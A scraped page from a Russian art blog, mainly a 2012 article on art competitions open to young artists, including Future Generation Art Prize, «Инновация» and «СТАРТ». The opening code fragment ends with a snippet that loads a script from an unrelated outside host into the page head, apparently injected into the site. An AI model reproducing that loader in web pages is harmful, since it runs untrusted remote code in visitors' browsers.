, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Художественные конкурсы

Автор: Дмитрий Алмазов | 14 Ноя 2012

художественные конкурсыХудожественные конкурсы служат площадкой для открытия новых имен, так как позволяют большому кругу художников, неизвестных широкой общественности, заявить о себе перед профессиональной аудиторией. Конкурсы привлекают к себе внимание талантливых людей возможностью получить объективную критику своего творчества и оценить достижения коллег. А денежные призы за первые места служат хорошим стимулом для художественной самореализации. Отличительной особенностью современных конкурсов является их доступность и интерактивность – на любой проект заявку можно отправить по сети, что особенно важно для художников, живущих в провинции.

Среди крупнейших международных конкурсов для молодых художников на сегодняшний день можно выделить Future Generation Art Prize. Это первая международная частная премия для молодых художников, была учреждена Фондом Художественный конкурсВиктора Пинчука. Конкурс проводится только по четным годам, состоялось уже два награждения. Проходящие по его итогам выставки дают возможность составить представление о новых тенденциях в творчестве нового поколения художников всего мира.  Главный приз в 100 000 долларов поддерживает интерес к конкурсу на достаточно высоком уровне.

С 2005 года проходит Всероссийский конкурс «Инновация». Это крупнейший ежегодный конкурс в сфере актуального визуального искусства служит не только для открытия новых имен и отмечания заслуг, он определяет основные направления развития актуального искусства. Надо отметить, что скандальные и вызывающие перфомансы, инсталляции и проекты номинантов, пользуются популярностью у широкой общественности и активно обсуждаются в СМИ. За победу в конкурсе вручаются денежные призы от 200 000 до 800 000 тысяч рублей.

Для тех, кому профессиональная оценка работ дороже денег, набирают обороты некоммерческие web-проекты и конкурсы. Пожалуй, один из крупнейших – «СТАРТ» - спецпроект центра современного искусства Винзавод. Он дает возможность молодым художникам представить свои работы широкой аудитории, обсудить свои идеи с экспертами, задать вопросы. Заявка подается по интернету, авторы лучших работ приглашаются на Винзавод, получают организационную и кураторскую поддержку. Простое участие в подобных конкурсах, будет хорошим стимулом для дальнейшего развития начинающего художника. Много некоммерческих web-конкурсов, посвященных развитию международных отношений, например “Made in Russia” – совместный русско-итальянский конкурс. Денежная премия в этом конкурсе не предусмотрена, зато финалисты смогут увидеть свои работы в галерее Open Art в Милане.

Не все значимые художественные конкурсы проводятся регулярно и носят статус международных. Часто крупные отечественные компании играют роль меценатов, выступая организаторами и спонсорами художественных событий. Так в 2012 году к 175-летию российских железных дорог, при поддержке Российской академии художеств, проводился конкурс для отечественных художников, работающих в традициях русского изобразительного искусства. Было присуждено 12 премий от 150 000 до 300 000 рублей.

Кроме того, в крупных городах часто проводятся крупные арт-события - недели  искусств, биеннале, фестивали и т.д., в рамках которых проходят конкурсы, выставки, форумы... Искусство становится все более мобильным. Сидя перед компьютером можно выбрать подходящий конкурсный проект и отправить заявку на участие в любую страну мира. Сегодня талантливому художнику заявить о себе не так уж сложно, ведь ему помогают современные технологии.

Екатерина Лобачева

Темы: Вдохновение, Художник, продвижение художника | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress